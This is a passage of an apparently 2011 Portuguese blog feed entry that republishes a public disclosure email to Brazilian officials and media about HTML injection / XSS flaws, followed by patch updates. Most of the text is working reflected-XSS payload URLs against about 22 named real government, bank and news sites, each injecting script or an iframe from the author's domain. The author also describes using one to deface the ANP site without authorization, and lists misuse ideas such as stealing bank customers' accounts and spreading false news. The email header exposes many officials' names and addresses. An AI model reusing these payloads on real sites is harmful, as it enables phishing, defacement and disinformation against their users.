A CAIXA corrigiu a brecha pela metade, mas já foi um avanço. Vocês podem testar aqui e aqui para comprovar que ainda existe a falha.

UPDATE 07/06/2011 - 17h08
O MF (Ministério da Fazenda) corrigiu a brecha. De um jeito tosco, mas corrigiu... agora eles retiram da busca os caracteres "<" e ">"</summary>
        <content type="html" xml:lang="pt" xml:base="http://metaldot.alucinados.com/pivot/entry.php?id=54&amp;w=my_weblog"><![CDATA[
                <b>De</b>: "Marcelo Jorge Vieira" &lt;metal@mundobugado.org&gt;<br />
<b>Para</b>:  "ANP Imprensa" &lt;imprensa@anp.gov.br&gt;, "CAIXA - Imprensa" &lt;imprensa@caixa.gov.br&gt;, "Jorge Fontes Hereda" &lt;presidencia@caixa.gov.br&gt;, "Joaquim Lima de Oliveira" &lt;vitec@caixa.gov.br&gt;, "CEB - Comunicação Social" &lt;prcoe@ceb.com.br&gt;, "Conselho de Consumidores da CEB" &lt;conselho.ceb@ceb.com.br&gt;, "Glaucius Oliva" &lt;presidencia@cnpq.br&gt;, "CNPq Ascom" &lt;comunicacao@cnpq.br&gt;, "Olímpio Cruz" &lt;olimpio.cruz@agricultura.gov.br&gt;, "MMA Ascom" &lt;imprensa@agricultura.gov.br&gt;, "Maria Lucia Muniz" &lt;mlmuniz@mct.gov.br&gt;, "MCT Ascom" &lt;ascomt@mct.gov.br&gt;, "Maristela Rangel Pinto" &lt;cgm@cultura.gov.br&gt;, "Nanan Catalão" &lt;nanan.catalao@cultura.gov.br&gt;, "Denise Mantovani" &lt;denise.mantovani@mda.gov.br&gt;, "MDA Ascom" &lt;comunicacao.social@mda.gov.br&gt;, "Nunzio Briguglio Filho" &lt;nunzio@mec.gov.br&gt;, "MEC Ascom" &lt;imprensa@mec.gov.br&gt;, "Ramiro Alves" &lt;ramiro.alves@fazenda.gov.br&gt;, "MF Ascom" &lt;acs@fazenda.gov.br&gt;, "Gerusa Barbosa" &lt;gerusa.barbosa@mma.gov.br&gt;, "MMA Ascom" &lt;ascom@mma.gov.br&gt;, "Antônio Carlos" &lt;aclima@mme.gov.br&gt; ,"MME Ascom" &lt;ascom@mme.gov.br&gt;, "Vanice Cioccari" &lt;vanice.cioccari@mj.gov.br&gt;, "MJ Ascom" &lt;acs@mj.gov.br&gt;, "PBH Ascom" &lt;ascom@planejamento.mg.gov.br&gt;, "Walter Carlos Auad Sotomayor" &lt;walter.sotomayor@turismo.gov.br&gt;, "Turismo Ascom" &lt;imprensa@turismo.gov.br&gt;, "Selvino Heck" &lt;mobsocial@planalto.gov.br&gt;, "Casa Civil da Presidência da República" &lt;mprensaccivil@presidencia.gov.br&gt;, "Benjamin Zymler" &lt;min-bz@tcu.gov.br&gt;, "Augusto Nardes" &lt;min-an@tcu.gov.br&gt;, "Estadão - Fale com" &lt;falecom.estado@grupoestado.com.br&gt;, "Estadão - Portal" &lt;portal@grupoestado.com.br&gt;, "Nelson Nunes" &lt;nnunes@diariosp.com.br&gt;, "Carlos Alencar" &lt;carlos.alencar@diariosp.com.br&gt;, "Ulisses Oliveira" &lt;ulisses.oliveira@diariosp.com.br&gt;, "Teodomiro Braga" &lt;teodomiro@otempo.com.br&gt;, "Fábio A. Santos" &lt;tecnologia@otempo.com.br&gt;, "Luiz Fernando Rocha" &lt;luizrocha@otempo.com.br&gt;, "Mylena Fiori" &lt;mfiori@cartamaior.com.br&gt;, "Carta Maior - Redação" &lt;redacao@cartamaior.com.br&gt;, "Terra - Abuse" &lt;abuse@terra.com.br&gt;, "Terra - Editorial" &lt;editorial@terra.com.br&gt;, "Roberto Borges Martins" &lt;presidencia@redeminas.mg.gov.br&gt;, "Hugo Teixeira" &lt;hugoteixeira@redeminas.mg.gov.br&gt;, "Franco Brostel Nunes Leal" &lt;franco@redeminas.mg.gov.br&gt;, "Luiz Silvério Pereira Meireles" &lt;ditec@redeminas.mg.gov.br&gt;, "Rodolfo Fernandes" &lt;rodolfo@oglobo.com.br&gt;, "Maria Fernanda Delmas" &lt;fernanda.delmas@oglobo.com.br&gt;, "Ascânio Seleme" &lt;ascanio@oglobo.com.br&gt;, "Folha Emergência" &lt;folhaemergencia@uol.com.br&gt;, "Folha Poder" &lt;politica@uol.com.br&gt;, "Ministério da Defesa" &lt;imprensa@defesa.gov.br&gt;, "Ministério da Defesa - Ascom" &lt;ascom@defesa.gov.br&gt;,</p><br />
<br />
Olá,<br />
<br />
No início do mês de Abril, eu descobri uma falha no site da ANP (Agência Nacional do Petróleo), que eu explorei para mudar a visualização do site, inserindo um formulário, um abaixo-assinado, onde um visitante poderia assinar seu nome como uma forma de protesto aos altos preços dos combustíveis.<br />
<br />
Essa falha (primária) não altera o conteúdo do site, apenas muda a visualização e só funciona, se o usuário clicar em um link "batizado" com parâmetros específicos, como, por exemplo, o link abaixo usado para inserir o formulário no site da ANP: http://www.anp.gov.br/?q=&lt;iframe src='http://mundobugado.org/anp'&gt; (o link não funciona mais, o pessoal da ANP já consertou a falha nesse ponto).<br />
<br />
No meu blog, tem um relato explicando melhor o caso da <a href="http://metaldot.alucinados.com/pivot/entry.php?id=51" title="ANP e o Mundo Bugado">ANP e o Mundo Bugado</a>.<br />
<br />
Como sou curioso, quis saber se outros sites também apresentavam a mesma falha. Minha mãe sempre diz: Quem procura, acha! E é claro que eu achei e não foram poucos.<br />
<br />
<b>.gov.br</b>:<ul><li>ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)</li><li>Brazilian Tourism Portal (Ministério do Turismo)</li><li>CAIXA (O banco que acredita nas pessoas)</li><li>CEB (Companhia Energética de Brasília)</li><li>Domínio Público (Ministério da Educação)</li><li>Embratur (Ministério do Turismo)</li><li>MF (Ministério da Fazenda)</li><li>MINC (Ministério da Cultura </li><li>MMA (Ministério do Meio Ambiente)</li><li>MME (Ministério de Minas e Energia)</li><li>MDA (Ministério do Desenvolvimento Agrário)</li><li>MCT (Ministério da Ciência e Tecnologia)</li><li>Portal da Transparência (Presidência)</li><li>Plataforma Lattes (CNPq)</li><li>SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)</li><li>TCU (Tribunal de Contas da União)</li></ul><br />
<b>Jornal/TV</b>: <ul><li>Estadão</li><li>Carta Maior</li><li>O TEMPO</li><li>Diário de São Paulo</li><li>Terra</li><li>Rede Minas</li></ul><br />
<br />
O que eu quero com esse email?! Reportar essa falha, porque ela poderia ser explorada de várias maneiras:<br />
<ul><li>Uma pessoa mal intencionada poderia substituir a página inicial da CAIXA para "roubar" as contas de alguns clientes.</li><li>Usar o site do Ministério da Cultura para falar mal da Ministra, uma vez que surgiram vários temas relacionados à ela nos últimos dias.</li><li>Fazer mais uma campanha sobre os altos preços dos combustíveis no site da ANP.</li><li>Usar o site do Ministério da Fazenda para falar que não é mais preciso declarar Imposto Renda.</li><li>Publicar todas as falsas notícias no ESTADÃO, no Diário de São Paulo, no O Tempo, no Terra, na Carta Maior e na Rede Minas.</li></ul><br />
Com essa coleção de sites, é bem fácil criar uma rede de intrigas, verdades ou mentiras, como, por exemplo, "O brasil desistiu de sediar a copa", "O brasil vai vender a Amazônia", etc.<br />
<br />
Por todos os motivos citados acima, essa falha é uma questão de Segurança Nacional.<br />
<br />
Estou enviando e publicando esse email, porque não acredito no contato privado com suas instituições. A ANP demonstrou muito bem esse ponto ao não assumir a falha no site e no sistema de preços, e ainda fazer um comunicado sobre um endereço falso circulando na Internet e ao mesmo tempo retirar o sistema de consulta dos preços do ar.<br />
<br />
<b>Segue os links com as páginas alteradas, para confirmar</b><br />
<br />
<b>.gov.br</b>:<br />
<br />
* <a href="http://www.anp.gov.br/SITE/acao/estaaqui/?s1=&lt;script&gt;window.onload=function(){document.write('&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/anp/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;')}&lt;/script&gt;">ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)</a> (Fixed! Corrigido!)<br />
<code>http://www.anp.gov.br/SITE/acao/estaaqui/?s1=&lt;script&gt;window.onload=function(){document.write('&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/anp/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;')}&lt;/script&gt;</code><br />
<br />
* <a href="http://www.braziltour.com/busca.html?search=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/braziltour/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220&lt;/code&gt;%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E">Brazilian Tourism Portal (Ministério do Turismo)</a><br />
<code>http://www.braziltour.com/busca.html?search=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/braziltour/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220&lt;/code&gt;%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E</code><br />
<br />
* <a href="http://www1.caixa.gov.br/busca/resultados.asp?q2=1&q1=%27%29;}%29;%3C/script%3E%3Ciframe%20src=%22http://metal.mundobugado.org/caixa/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C!--">CAIXA (O banco que acredita nas pessoas)</a><br />
<code>http://www1.caixa.gov.br/busca/resultados.asp?q2=1&q1=%27%29;}%29;%3C/script%3E%3Ciframe%20src=%22http://metal.mundobugado.org/caixa/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C!--</code><br />
<br />
* <a href="http://www.ceb.com.br/Ceb/aplicacoes/index.cfm?fuseaction=busca.realizarbusca&pesquisa=%3Ciframe%20src=%22http://metal.mundobugado.org/ceb/%22%20width=%221260%22%20height=%222500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E">CEB (Companhia Energética de Brasília)</a><br />
<code>http://www.ceb.com.br/Ceb/aplicacoes/index.cfm?fuseaction=busca.realizarbusca&pesquisa=%3Ciframe%20src=%22http://metal.mundobugado.org/ceb/%22%20width=%221260%22%20height=%222500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E</code><br />
<br />
* <a href="http://www.dominiopublico.gov.br/pesquisa/PesquisaAutorResultadoForm.do?letra=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/dominiopublico/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E">Domínio Público (Ministério da Educação)</a> (Fixed! Corrigido!)<br />
<code>http://www.dominiopublico.gov.br/pesquisa/PesquisaAutorResultadoForm.do?letra=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/dominiopublico/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E</code><br />
<br />
* <a href="http://www.embratur.gov.br/site/br/busca/busca.php?palavra=','')&quot;&gt;&lt;script&gt;window.onload=function(){document.write('&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/embratur/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;')}&lt;/script&gt;">Embratur (Ministério do Turismo)</a><br />
<code>http://www.embratur.gov.br/site/br/busca/busca.php?palavra=','')&quot;&gt;&lt;script&gt;window.onload=function(){document.write('&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/embratur/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;')}&lt;/script&gt;</code><br />
<br />
* <a href="http://www.fazenda.gov.br/busca.asp?pesquisa=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/fazenda/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--">MF (Ministério da Fazenda)</a> (Fixed! Corrigido!)<br />
<code>http://www.fazenda.gov.br/busca.asp?pesquisa=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/fazenda/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--</code><br />
<br />
* <a href="http://fale.cultura.gov.br/sisouvidor/login/formularioLogin.jsp?UsuarioInvalido=&lt;script&gt;window.onload=function(){document.write('&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/minc/&quot; width=&quot;1260&quot; height=&quot;9100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;')}&lt;/script&gt;">MINC (Ministério da Cultura)</a><br />
<code>http://fale.cultura.gov.br/sisouvidor/login/formularioLogin.jsp?UsuarioInvalido=&lt;script&gt;window.onload=function(){document.write('&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/minc/&quot; width=&quot;1260&quot; height=&quot;9100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;')}&lt;/script&gt;</code><br />
<br />
* <a href="http://www.mma.gov.br/sitio/index.php?ido=conteudo.pesquisa&busca=%22%3C/h2%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/mma/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E">MMA (Ministério do Meio Ambiente)</a><br />
<code>http://www.mma.gov.br/sitio/index.php?ido=conteudo.pesquisa&busca=%22%3C/h2%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/mma/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E</code><br />
<br />
* <a href="http://www.mme.gov.br/mme/buscaresult.html?field=content&index=indice_mme&query=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mme/%22%20width=%221260%22%20height=%223500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E">MME (Ministério de Minas e Energia)</a><br />
<code>http://www.mme.gov.br/mme/buscaresult.html?field=content&index=indice_mme&query=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mme/%22%20width=%221260%22%20height=%223500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E</code><br />
<br />
* <a href="http://mda.gov.br/sistemas/sistemasmda/index.php?msg=%3Cscript%3E$%28function%28%29{%20$%28%22body%22%29.empty%28%29.append%28%22%3Cbody%20style=%27margin:%200px%200px%27%3E%3Ciframe%20src=%27http://metal.mundobugado.org/mda/%27%20width=%271260%27%20height=%273200%27%20frameborder=%270%27%20marginheight=%270%27%20marginwidth=%270%27%20scrolling=%27no%27%3E%3C/body%3E%22%29%20}%29">MDA (Ministério do Desenvolvimento Agrário)</a><br />
<code>http://mda.gov.br/sistemas/sistemasmda/index.php?msg=%3Cscript%3E$%28function%28%29{%20$%28%22body%22%29.empty%28%29.append%28%22%3Cbody%20style=%27margin:%200px%200px%27%3E%3Ciframe%20src=%27http://metal.mundobugado.org/mda/%27%20width=%271260%27%20height=%273200%27%20frameborder=%270%27%20marginheight=%270%27%20marginwidth=%270%27%20scrolling=%27no%27%3E%3C/body%3E%22%29%20}%29</code><br />
<br />
* <a href="http://www.mct.gov.br/index.php?action=/html/objects/search_result&searchquery=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload%20=%20function%28%29%20{%20document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mct/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%20}%3C/script%3E%3C!--">MCT (Ministério da Ciência e Tecnologia)</a><br />
<code>http://www.mct.gov.br/index.php?action=/html/objects/search_result&searchquery=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload%20=%20function%28%29%20{%20document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mct/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%20}%3C/script%3E%3C!--</code><br />
<br />
* <a href="http://www.portaltransparencia.gov.br/despesasdiarias/resultado?consulta=rapida&amp;periodoInicio=&quot;&gt;&lt;script&gt;window.onload=function(){document.write('&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/portaltransparencia/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;')}&lt;/script&gt;">Portal da Transparência (Presidência)</a><br />
<code>http://www.portaltransparencia.gov.br/despesasdiarias/resultado?consulta=rapida&amp;periodoInicio=&quot;&gt;&lt;script&gt;window.onload=function(){document.write('&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/portaltransparencia/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;')}&lt;/script&gt;</code><br />
<br />
* <a href="http://buscatextual.cnpq.br/buscatextual/busca.do?metodo=buscar&textoBusca=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/cnpq\%22%20%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E">Plataforma Lattes (CNPq)</a><br />
<code>http://buscatextual.cnpq.br/buscatextual/busca.do?metodo=buscar&textoBusca=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/cnpq\%22%20%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E</code><br />
<br />
* <a href="https://sindecbh.pbh.gov.br:444/sindecconsulta/?msg=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/sindec/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--">SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)</a> (Fixed! Corrigido!)<br />
<code>https://sindecbh.pbh.gov.br:444/sindecconsulta/?msg=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/sindec/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--</code><br />
<br />
*  <a href="https://login.tcu.gov.br/sso/jsp/login.jsp?site2pstoretoken=&amp;p_submit_url=&amp;p_cancel_url=&amp;locale=%22%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Ftcu%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E">TCU (Tribunal de Contas da União)</a><br />
<code>https://login.tcu.gov.br/sso/jsp/login.jsp?site2pstoretoken=&amp;p_submit_url=&amp;p_cancel_url=&amp;locale=%22%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Ftcu%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E</code><br />
<br />
<b>Jornal/TV</b>:<br />
<br />
* <a href="http://www.estadao.com.br/busca/%3C%2Ftitle%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Festadao%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E">Estadão</a> (Fixed! Corrigido!)<br />
<code>http://www.estadao.com.br/busca/%3C%2Ftitle%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Festadao%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E</code><br />
<br />
* <a href="http://cartamaior.com.br/templates/buscaExecutar.cfm?busca=%3C/title%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/cartamaior/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--">Carta Maior</a><br />
<code>http://cartamaior.com.br/templates/buscaExecutar.cfm?busca=%3C/title%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/cartamaior/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--</code><br />
<br />
* <a href="http://www.otempo.com.br/videos/lista/?busca=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/otempo/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E">O TEMPO<a/><br />
<code>http://www.otempo.com.br/videos/lista/?busca=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/otempo/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E</code><br />
<br />
* <a href="http://www.diariosp.com.br/?id=%2Fbusca.php&amp;ds_busca=&lt;script&gt;window.onload=function(){document.write('&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/diariosp/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;')}&lt;/script&gt;">Diário de São Paulo</a><br />
<code>http://www.diariosp.com.br/?id=%2Fbusca.php&amp;ds_busca=&lt;script&gt;window.onload=function(){document.write('&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/diariosp/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;')}&lt;/script&gt;</code><br />
<br />
*  <a href="http://buscador.terra.com.br/Default.aspx?source=Search&ca=s&query=%3C/title%3E%3Ciframe%20src=%22http://is.gd/lCgKDa%22%20width=1260%20height=2100%20frameborder=0%20scrolling=%22no%22%3E%3C!--">Terra</a> (Fixed! Corrigido!)<br />
<code>http://buscador.terra.com.br/Default.aspx?source=Search&ca=s&query=%3C/title%3E%3Ciframe%20src=%22http://is.gd/lCgKDa%22%20width=1260%20height=2100%20frameborder=0%20scrolling=%22no%22%3E%3C!--</code><br />
<br />
* <a href="http://www.redeminas.mg.gov.br/search/node/%22%3E%3C/a%3E%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http%3A/%252Fmetal.mundobugado.org/redeminas/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%7D%3C/script%3E">Rede Minas</a><br />
<code>http://www.redeminas.mg.gov.br/search/node/%22%3E%3C/a%3E%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http%3A/%252Fmetal.mundobugado.org/redeminas/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%7D%3C/script%3E</code><br />
<br />
<b>O que é HTML Injection ou XSS (Cross-site scripting)?</b><br />
<br />
HTML Injection é um tipo de vulnerabilidade encontrada normalmente em sistemas Web e é explorada com a inserção de código HTML/JavaScript nos parâmetros de um formulário, por exemplo. Não faz nenhuma mudança nos arquivos do servidor, apenas muda a visualização dos dados para o usuário.<br />
<br />
<b>O que é HTML?</b><br />
<br />
"<a href="http://pt.wikipedia.org/wiki/HTML" title="HTML">HTML</a> (acrônimo para a expressão inglesa HyperText Markup Language, que significa Linguagem de Marcação de Hipertexto) é uma linguagem de marcação utilizada para produzir páginas na Web" -- Wikipédia<br />
<br />
<b>O que é JavaScript?</b><br />
<br />
<a href="http://pt.wikipedia.org/wiki/Javascript" title="JavaScript">JavaScript</a> é uma linguagem de programação muito utilizada para produzir páginas na Web.<br />
<br />
<b>Como resolver?</b><br />
<br />
Remover todas as tags HTML de todos os parâmetros. Para cada linguagem utilizada para produzir o site, existe uma forma de remover as tags: <a href="http://msdn.microsoft.com/en-us/library/ms525347%28v=vs.90%29.aspx" title="ASP">ASP</a>, <a href="http://br.php.net/manual/en/function.htmlentities.php" title="PHP">PHP</a>, <a href="http://wiki.python.org/moin/EscapingHtml" title="Python">Python</a>, <a href="http://commons.apache.org/lang/api-release/org/apache/commons/lang/StringEscapeUtils.html#unescapeHtml%28java.lang.String%29" title="Java">Java</a>.<br />
<br />
-------<br />
<br />
<b>UPDATE 17/05/2011 - 20h34</b><br />
<code>ANP, Dominio Público e Terra corrigiram as "brechas".</code><br />
<br />
<b>UPDATE 18/05/2011 - 00h07</b><br />
<code>ESTADÃO corrigiu a "brecha".</code><br />
<br />
<b>UPDATE 18/05/2011 - 11h12</b><br />
<code>Caro Marcelo,<br />
A falha mencionada foi corrigida, agradecemos a notificação.<br />
